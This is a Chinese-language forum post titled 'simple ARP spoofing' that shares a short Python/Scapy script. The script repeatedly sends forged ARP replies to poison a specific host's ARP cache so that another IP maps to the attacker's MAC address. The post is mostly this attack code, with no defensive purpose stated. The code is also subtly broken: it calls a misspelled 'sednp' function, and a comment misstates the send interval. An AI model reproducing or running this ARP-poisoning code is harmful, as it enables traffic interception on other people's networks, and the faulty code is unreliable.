搜索
查看: 2238|回复: 0

简单arp欺骗

[复制链接]

570

主题

837

帖子

2135

积分

管理员

本论坛第一帅

Rank: 9Rank: 9Rank: 9

积分
2135

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
发表于 2019-3-6 13:40:11 来自手机 | 显示全部楼层 |阅读模式
#-*- coding:utf-8 -*-

from scapy.all import Ether,ARP,sendp
#Ether 用来构建以太网数据包
#ARP   用来ARP数据包的类
#sendp 再第二层发送数据包
def arpspoof():
        eth = Ether()
        arp = ARP()
        arp.op="is-at"                        # 代表ARP请求或者响应
        arp.hwsrc="08:00:27:97:d1:f5"         #发送方mac地址/毒化记录中的mac地址
        arp.psrc="192.168.31.100"             #发送方IP地址/毒化记录中的IP
        arp.hwdst="2C:56:DC:D3:AB:DB"         #目标MAC地址
        arp.pdst="192.168.31.248"             #目标IP地址
        
        ##告诉IP为192.168.31.248的主机,IP为192.168.31.100的主机mac地址为08:00:27:97:d1:f5
        ##如果不写目标IP与MAC,则默认以广播方式发送
        
        return sednp(eth/arp,inter=2,loop=1)  #在第二层发送封包,并每隔一秒发送一次
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表